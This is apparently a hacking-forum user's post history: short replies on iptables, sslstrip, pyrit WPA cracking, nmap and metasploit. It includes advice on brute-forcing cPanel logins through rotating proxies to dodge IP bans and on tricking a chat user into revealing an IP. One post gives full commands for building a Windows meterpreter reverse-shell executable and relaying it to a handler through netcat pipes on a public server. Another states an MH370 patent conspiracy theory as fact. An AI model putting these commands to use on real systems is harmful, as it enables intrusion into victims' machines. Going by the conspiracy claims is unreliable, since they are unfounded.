-
Posts
939 -
Joined
-
Last visited
-
Days Won
22
Posts posted by i8igmac
-
-
there are iptable tutorials for this.
Using iptables on tthe router send the traffic to a machine running a proxy. Then with this proxy you can configure more iptable rules to block or redirect a up to date list of known ads by ip... you could even catch the users with a redirect to beef or something
-
Airbase-ng -P
This works for me... -P responds to all probe request... i dont see the need for karma these days
-
I think iptables is what u need.
research some ddos iptable rules
-
Start up a live cd and try to start monitor mode
Airmon-ng wlan0
-
If u want to feel and see improvements... get a solid state hard drive...
I doubt you will experience any kind of performance increase with the chip upgrade you post
-
so. I have tried sending some fb traffic threw sslstrip and I get nothing.
I have tried sending fb traffic threw burp proxy and the browser wont even ask to install the cert.
Google traffics works fine with sslstrip and burp certs
I would like to capture some headers for automated task's... I have done all this before but today I notice facebook wont give...
Can some one try sslstrip on facebook? let me know if its working or not?
-
http://www.darkoperator.com/installing-metasploit-in-ubunt/
I think u need to complete the install of libs sqlite and postgres
-
I have had successful results and nice speed with pyrit cuda
Longest I have seen was about 8hr crack at 14000per second
pre computed results is insane if you have hard drive space to waist you may see a few million per second
any one with this torrent... get your self a cuda powered rig and u must learn the basics of pyrit
-
it is not uncommon to be scanned! It happens! Would be interested in seeing a tcodump! I wondr if maybe metasploit exploit handler has a zero day floating around
Apt-get install tcpick
Tcpick -yP -C "port 4444"
Your windows machine should not hang on the stage, something is wrong. I would try a reverse meterpreter with out the stager
-
for discovering a pineapple.
what if u sent off a probe for ssid like pineapple-checker and that ssid exist then wouldn't this be a dead give away?
-
These public encoders will be undetectable for how long?
shikata was 100% undetectable for not long.
98% then 95% 90% 80% 50% as virustital showed after only a few months after its release.
Why go public with a fantastic tool like shikata? Or even the tool posted above...
-
this maybe dumb question. Did u setup msf multi/handler?
Can u try to build a payload with out piping threw the encoder, by default I think shikata is already used by msfpayload.
Also post your multi/handler commands
try a few payloads.
-
-
So wrong, not all minds can grasp this stuff... just a example...That Sir was awesome. Thank you very mucch my question is answered .
if you sit down and look at what this forum teaches - Tor is freaking useless!
Lets say u want to brute force a cpannel login, I could explain the ip banning process but Ill skip that...
You must sleep for 5 seconds between each login attempt, if you have a list of 100 proxy's you can now achieve how many password attempts per minute ?
If it took 20,000 attempts for a success how long will it take?
How long would it take with out tor?
How easy was this attack?
one ip address would take 1,666 minutes
100 ip address would take 16 minutes
Is my math wrong? Lol
-
I would start with nmap. follow some irongeek nmap tutorials. Discover the devices on your network. find open ports on these devices and how to use the service.
As cooper said disect each command nmap -h
metasploit is also fun and will have u hooked. Install damn vulnerable os
iron geek also has some old videos on metasploit
-
-
I feel that if application ex-girlfriend.exe is established a connection, should be the first place you look.
I would bet ex girlfriend had direct access to this machine...
-
Is this your private network? Are u on windows? Do u know how to use nmap?
If you are on windows you should restart your computer and then run in cmd 'netstat -nb' this will print out applications established connections... always monitor your applications out going traffic... post the output here plz... run the command every few minuts...
I'm sure if someone is spying on u. We can find it...
Or did I miss understand your post?
Edit; The chunck of data base64: can be decoded paste that chunk into a online decodér
Check google 'online base64 decoder'
-
20 Freescale employees, among 239 people on flight MH370, were engineers working on radio frequency products for applications in avionics, radar, missile guidance, electronic warfare and identification friend or foe technologys...
4 days after the flight disappeared, semiconductor patent was approved by the US patent office. The patent was split between 5 people at 20%
4 of those people disappeared with the flight...
Rothschild inherits 100% of semiconductor patent...
I'm board and wonder how radars work and then how would you trick the radar in think you don't exist
-
run pyrit benchmark after installing proper drivers. You have a mobile gpu cracker... learn some pyrit wpa cracking...
my geforce 560m can do 14000 passwords per second
And once precomputed like 2 million psk
sql injection is what's hot... learn it... learn the scanners and manual attacks...
Perl python ruby... pick one and do some basic socket application
-
Netstat -np
scrole to the top of this output and u will see applications established ip's
I don't know anything about this chat application but I'm sure you are not directly connected to the other client.
So, it you most likely need to send a link u hope they click on...
And once u do have there ip I'm sure a simple nmap scan will show all filtered ports.
so you may need some social Engineering. exploit the user is better quicker results
-
Rm -R tab complete was also the mistake I made that deleted a hole project/ folder... years of work safely recovered...
Testdrive I believe was the tool I posted for my recovering
-
I have a local SVN server and I usually back it up in there but in this case I didn't and while saying "rm [tab complete file name]" I accidentally deleted my script before ever backing it up. But yes back ups are very important
-
Ok, im at my machine, this should work...
kali_local-ip=192.168.70.103
ssh-box_ip=66.66.66.66 #public-ip
port 666 and 555 need to be farword on your ssh-box
ssh-box
mkfifo ssh-box
nc -l -p 555 0<ssh-box | nc -l -p 666 1>ssh-box
kali
from kali, generate payload and set up handler... transfer your payload to the victim... start some nc pipes
msfpayload windows/meterpreter/reverse_tcp LHOST=[ssh-box_ip] LPORT=666 X > test.exe
msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=[kali_local-ip] lport=444 E
#new terminal
mkfifo kali
nc [kali_local-ip] 444 0<kali | nc [ssh-box_ip] 555 1>kali
Now
victim execute test.exe will connect back to ssh on port 666
does anyone know any good hacking movies?
in Questions
Posted
there was a part in ironman 2 where the villain pops the login page with some sql injection. 'Your software shit'